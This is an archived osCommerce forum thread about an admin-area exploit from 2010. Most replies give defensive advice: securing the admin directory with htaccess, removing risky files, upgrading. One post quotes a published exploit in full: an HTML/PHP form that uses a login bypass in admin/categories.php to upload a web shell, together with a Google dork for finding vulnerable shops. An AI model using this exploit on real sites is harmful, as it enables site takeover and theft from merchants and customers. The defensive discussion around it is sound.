Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

New exploit TODAY is out !


pamamolf

Recommended Posts

I think this has already been discussed - htaccess of the admin folder etc etc

 

I could be wrong and no doubt if I am I'm sure if this is a new exploit some of the php gurus will soon have something to say.....

I'm feeling lucky today......maybe someone will answer my post!

I do try and answer a simple post when I can just to give something back.

------------------------------------------------

PM me? - I'm not for hire

Link to comment
Share on other sites

It is an OLD exploit using file_manager.php and define_language.php. REMOVE those files from the admin directory, the languages directory and also remove the link from tools.php.

 

 

Refer to this thread for more information:

 

Admin Security

 

 

 

Chris

Link to comment
Share on other sites

Hi there,

this is the new exploit, he was published today:

 

oscommerce remote upload from categories.php

 

# Exploit Title: [oscommerce remote upload from categories.php]

# Google Dork: ["powered by oscommerce"]

# Date: [20-November-2010]

# Author: [Number 7]

#Contact: {an[dot]7[at]live[dot]fr}

# Software Link: [http://www.oscommerce.com/solutions/downloads]

# Tested on: [windows-linux-FreeBSD-Solaris]

 

exploit:

 

<html>

<head>

<title>Download</title>

</head>

<body>

<div style="text-align: center;"><big

style="color: rgb(253, 0, 0);"><big><big>Discovered

By Number 7<br>

</big></big></big><span

style="color: rgb(102, 102, 102);">(best defacer kairouan

tunisia 2010)</span><br>

</div>

<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>Oscommerce

script: Remote File Upload in /admin/Categories.php</big></big><br>

<?php $host ="site";

$path ="ath";

?>

<form name="new_product"

action="http://<?php echo $host;echo $path; ?>/admin/categories.php/login.php?cPath=&action=new_product_preview"

method="post" enctype="multipart/form-data"><br>

<input name="products_image" type="file"><br>

<input name="submit" value=" Save " type="submit"><br>

<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>shell

here:</big></big><br>

<?php echo ("Using upload File : <a href=http://$host/$path/images/product_info.php>$host/</>$path</>/images/product_info.php</a></font></body>");

?></form>

</body>

</html>

 

[~] Greetz tO: [Meher-Assel(Net-Own3r#Shichemt-Älen#Sami(s-man)#zone-h/crew#all tunisian hackers]

[~] Home :info-geek.com/ # v4-team.com/cc/

Link to comment
Share on other sites

 

this is the new exploit, he was published today:

 

action="http://<?php echo $host;echo $path; ?>/admin/categories.php/login.php?cPath=&action=new_product_preview"

 

HE may have found it, but it has been addressed before. The exploit uses an unsecured "admin" directory (see the action line above.) If you have secured the admin directory and changed it's name then this exploit will fail.

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Link to comment
Share on other sites

  • 4 months later...

its pointless to install any osc site without a minimum of security measures, out there are robots able to hack any unsecured osc site ten times any single day. I suggest to secure first and install after.

Link to comment
Share on other sites

its pointless to install any osc site without a minimum of security measures, out there are robots able to hack any unsecured osc site ten times any single day. I suggest to secure first and install after.

 

It is pointless to install ANY website without security measures

 

In these forums we tend to focus too much on the vulnerability of osC, all unprotected sites are vulnerable not just osC - like you know that blog you visited just before you logged into your osC admin or was it a forum like this? - Did you check your computer for viruses before logging in to your admin after, or did you rely on your anti virus catcher?

 

Being the webmaster of a site is really no different than being a surgeon in an operating theatre - you need to scrub up before entering

My store is currently running Phoenix 1.0.3.0

I'm currently working on 1.0.7.2 and hope to get it live before 1.0.8.0 arrives (maybe 🙄 )

I used to have a list of add-ons here but I've found that with the ones that supporters of Phoenix get any other add-ons are not really neccessary

Link to comment
Share on other sites

  • 2 weeks later...

This hack exploits the PHP basename function in admin directories where htaccess is not used to control logins. The code in admin/includes/application_top.php can be amended to stop this hack - but the safest solution, as mentioned above, is to use htaccess in the admin directory.

Your online success is Paramount.

Link to comment
Share on other sites

Or just upgrade to 2.3.1 where this exploit isn't possible thumbsup.gif

Mark Evans

osCommerce Monkey & Lead Guitarist for "Sparky + the Monkeys" (Album on sale in all good record shops)

 

---------------------------------------

Software is like sex: It's better when it's free. (Linus Torvalds)

Link to comment
Share on other sites

Completely agree. It is not only oscommerce that is targetted... WordPress, Joomla, Drupal and even custom sites, if not secured

will be attacked (and probably hacked).

 

 

 

It is pointless to install ANY website without security measures

 

In these forums we tend to focus too much on the vulnerability of osC, all unprotected sites are vulnerable not just osC - like you know that blog you visited just before you logged into your osC admin or was it a forum like this? - Did you check your computer for viruses before logging in to your admin after, or did you rely on your anti virus catcher?

 

Being the webmaster of a site is really no different than being a surgeon in an operating theatre - you need to scrub up before entering

Link to comment
Share on other sites

The best thing you can do for your web content is keep your site up to date with the latest code. That is the most secure practice albeit not always the easiest thing to do.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...